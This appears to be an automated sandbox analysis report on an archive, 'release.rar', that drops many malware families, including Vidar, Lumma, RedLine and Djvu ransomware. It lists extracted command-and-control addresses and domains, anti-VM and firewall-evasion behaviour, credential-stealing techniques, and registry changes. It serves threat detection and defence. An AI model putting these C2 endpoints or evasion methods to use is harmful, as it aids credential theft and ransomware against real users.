djvu | baa06057a238e7417c4a544875c85b8d4d408a2c4585631206530cd2360a713e

Resubmissions

08-03-2024 18:52

240308-xjbwsseg4t 10

07-03-2024 21:56

240307-1tj7psga4x 10

Analysis

max time kernel
1205s
max time network
1165s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07-03-2024 21:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

release.rar
Size

7.9MB
MD5

055bfe6e7bbf803236c3b1552f2ca0b1
SHA1

21559b4a5b1ab33dc5d91e5f3422d5d88dd70e93
SHA256

baa06057a238e7417c4a544875c85b8d4d408a2c4585631206530cd2360a713e
SHA512

410865555981d4da4eb11ab8fc37891ad01503c9bf86f30b0255460d6ed9cd3fdffa34bf4953f915254c81a6c8ed139ad389197fcd078eacdddfe92a3c5549a2
SSDEEP

196608:juqMF1FTRFBVltwEi790gw4RsYPdgoR2twuANg9QAFb:iqmLLBm8gw98BQwujP

Malware Config

Extracted

Family

vidar

Version

8.1

Botnet

8698e6090462c2758aa8aa2f4abb74a2

https://steamcommunity.com/profiles/76561199649267298

https://t.me/uprizin

Attributes

profile_id_v2
8698e6090462c2758aa8aa2f4abb74a2
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 OPR/96.0.0.0

Extracted

Family

vidar

Version

8.1

Botnet

1118c2aa8aae3b819bd8b2706f8dbe9d

https://steamcommunity.com/profiles/76561199649267298

https://t.me/uprizin

Attributes

profile_id_v2
1118c2aa8aae3b819bd8b2706f8dbe9d
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 OPR/96.0.0.0

Extracted

Family

smokeloader

Botnet

pub3

Extracted

Family

gcleaner

185.172.128.90

5.42.65.115

Extracted

Family

raccoon

Botnet

4ddee039c3c1cb01baf0736505e3e436

http://94.131.106.24:80

Attributes

user_agent
MrBidenNeverKnow

xor.plain

Extracted

Family

risepro

193.233.132.62

Extracted

Family

lumma

https://technologyenterdo.shop/api

https://detectordiscusser.shop/api

https://turkeyunlikelyofw.shop/api

https://associationokeo.shop/api

Signatures

Detect Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral2/memory/5288-703-0x0000000001BB0000-0x0000000001BE1000-memory.dmp	family_vidar_v7
behavioral2/memory/5288-746-0x0000000000400000-0x0000000001A34000-memory.dmp	family_vidar_v7
behavioral2/memory/5312-759-0x0000000001BB0000-0x0000000001BE0000-memory.dmp	family_vidar_v7
behavioral2/memory/5312-770-0x0000000000400000-0x0000000001A34000-memory.dmp	family_vidar_v7

Detect ZGRat V1 10 IoCs

resource	yara_rule
behavioral2/memory/5864-774-0x0000000000330000-0x00000000005CC000-memory.dmp	family_zgrat_v1
behavioral2/memory/1860-802-0x0000000000400000-0x000000000044C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5784-767-0x00000000007A0000-0x0000000000812000-memory.dmp	family_zgrat_v1
behavioral2/files/0x0007000000023539-756.dat	family_zgrat_v1
behavioral2/files/0x0007000000023534-755.dat	family_zgrat_v1
behavioral2/memory/5852-747-0x0000000000CE0000-0x00000000013CA000-memory.dmp	family_zgrat_v1
behavioral2/files/0x0007000000023539-702.dat	family_zgrat_v1
behavioral2/files/0x0007000000023541-698.dat	family_zgrat_v1
behavioral2/files/0x0007000000023541-697.dat	family_zgrat_v1
behavioral2/files/0x0007000000023541-392.dat	family_zgrat_v1

Detected Djvu ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/5720-763-0x0000000003780000-0x000000000389B000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 3 IoCs

resource	yara_rule
behavioral2/memory/2248-821-0x0000000003E60000-0x000000000474B000-memory.dmp	family_glupteba
behavioral2/memory/2248-840-0x0000000000400000-0x0000000001E11000-memory.dmp	family_glupteba
behavioral2/memory/5380-854-0x0000000000400000-0x0000000001E11000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"	Process not Found

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	Process not Found

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V2 payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023576-852.dat	family_raccoon_v2

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/1860-802-0x0000000000400000-0x000000000044C000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Enumerates VirtualBox registry keys 2 TTPs 10 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService\Performance	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF\Performance	taskmgr.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	20OAIXUdr4wvUDcH8dpdDTfg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	pwZ35FqiU3OeBSS0JTof8T37.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	pwZ35FqiU3OeBSS0JTof8T37.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
665	5344	2.3.1.1.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3984	netsh.exe
5816	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	pwZ35FqiU3OeBSS0JTof8T37.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	pwZ35FqiU3OeBSS0JTof8T37.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	pwZ35FqiU3OeBSS0JTof8T37.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	20OAIXUdr4wvUDcH8dpdDTfg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	20OAIXUdr4wvUDcH8dpdDTfg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	pwZ35FqiU3OeBSS0JTof8T37.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	08Pe92t38IhUjdjelmkTU5Aq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	R73AhOT__GA6HZOWmJT_6PE6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	cJDPFsk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	setup.exe

Executes dropped EXE 40 IoCs

pid	Process
4164	setup.exe
4248	setup.exe
548	setup.exe
2264	v0xDTuqvEPa9a6ZvVWNtlOgW.exe
2248	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
2076	OBLAwvm9ivOuzAxhr7WPxFVM.exe
5216	20OAIXUdr4wvUDcH8dpdDTfg.exe
5196	GOGiZZ7TyIhDAlIeP5sfGlZO.exe
5268	JynMWOEPU4IgIbVkKO84zcFB.exe
5288	YS5WX7w7h1C8FiujhDjhoYut.exe
5280	_f4qhCf0V96ULomnMJBT6ZYw.exe
5312	1oZdRn6Lg7UjbbxQsKZU0axb.exe
5324	UzKIBfmjFNozZXyrAyTGxD4s.exe
5360	R73AhOT__GA6HZOWmJT_6PE6.exe
5368	08Pe92t38IhUjdjelmkTU5Aq.exe
5380	9QiHXYjbvykQRsyWHraOQHU3.exe
5740	UzKIBfmjFNozZXyrAyTGxD4s.tmp
5784	qnXOl8WkCMEDE23eyGbEJpcm.exe
5792	OlHIbQCQzMDwcktuUDGh8kb_.exe
5852	cbfpM7BTr6beIVth9NAXnP2K.exe
5720	4Bt0hCDPbeDogzYRepH92ntN.exe
5864	qUa84PMRJDEifvgn16InDLia.exe
4444	pwZ35FqiU3OeBSS0JTof8T37.exe
4132	cruisemailer.exe
2336	4Bt0hCDPbeDogzYRepH92ntN.exe
3136	Install.exe
2572	cruisemailer.exe
3176	Install.exe
3476	wfplwfs.exe
5344	2.3.1.1.exe
696	9QiHXYjbvykQRsyWHraOQHU3.exe
5936	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
2100	todymdgvwmgb.exe
548	csrss.exe
2580	injector.exe
1140	EaxuNLp.exe
5396	htcrjfd
4544	hccrjfd
5236	cJDPFsk.exe
396	pwZ35FqiU3OeBSS0JTof8T37.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Wine	20OAIXUdr4wvUDcH8dpdDTfg.exe

Loads dropped DLL 6 IoCs

pid	Process
5740	UzKIBfmjFNozZXyrAyTGxD4s.tmp
5852	cbfpM7BTr6beIVth9NAXnP2K.exe
1420	taskmgr.exe
1820	rundll32.exe
3632	taskmgr.exe
3544	taskmgr.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
